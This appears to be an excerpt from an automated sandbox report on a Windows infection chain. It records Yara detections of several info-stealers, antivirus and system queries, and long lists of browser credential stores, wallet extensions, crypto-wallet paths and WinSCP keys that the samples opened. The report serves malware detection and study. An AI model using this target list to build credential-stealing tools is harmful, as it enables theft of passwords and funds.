Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md.cp310-win_amd64.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\charset_normalizer\md__mypyc.cp310-win_amd64.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002\unicodedata.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI85002 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0067CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_0067CBEA

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B9DBA0 GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,

12_2_00B9DBA0

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: b1dc05533c.exe, 00000014.00000002.269672784820.000000000121C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r\MsMpeng.exe
Source: b1dc05533c.exe, 00000014.00000003.269621268757.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675473570.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 8.2.axplong.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.0d47c4c34f.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.268855891646.0000000005400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.269317871785.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.269406632525.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.269472681805.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.268839327195.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.268857006626.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.269465852321.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: Process Memory Space: b1dc05533c.exe PID: 6412, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: b1dc05533c.exe, 00000014.00000003.269555760747.00000000012F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets!
Source: b1dc05533c.exe, 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: b1dc05533c.exe, 00000014.00000003.269581333238.00000000039E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty&
Source: b1dc05533c.exe, 00000014.00000002.269673864760.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: b1dc05533c.exe, 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: b1dc05533c.exe, 00000014.00000002.269673864760.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\shader-cache\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\moz-extension+++5e736be9-c24e-4afd-9b82-80cfe7b06e1d^userContextId=4294967295\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\temporary\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kzpbmws1.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\moz-extension+++5e736be9-c24e-4afd-9b82-80cfe7b06e1d^userContextId=4294967295\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\default\moz-extension+++5e736be9-c24e-4afd-9b82-80cfe7b06e1d^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\minidumps\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
